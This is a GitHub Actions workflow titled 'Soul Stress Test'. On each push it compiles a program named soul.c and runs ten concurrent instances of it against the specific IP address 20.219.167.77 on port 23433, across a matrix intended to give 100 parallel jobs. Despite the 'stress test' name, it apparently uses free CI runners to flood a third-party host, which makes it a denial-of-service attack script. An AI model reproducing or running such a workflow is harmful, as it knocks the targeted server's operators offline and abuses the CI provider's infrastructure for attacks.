name: Soul Stress Test

on: [push]

jobs:
  soul:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        n: [1..100]   # 100 parallel jobs
    steps:
      - uses: actions/checkout@v3
      - run: gcc soul.c -o soul1 -lpthread
      - run: |
          for i in {1..10}; do
            ./soul1 20.219.167.77 23433 300 60 &
          done
          wait
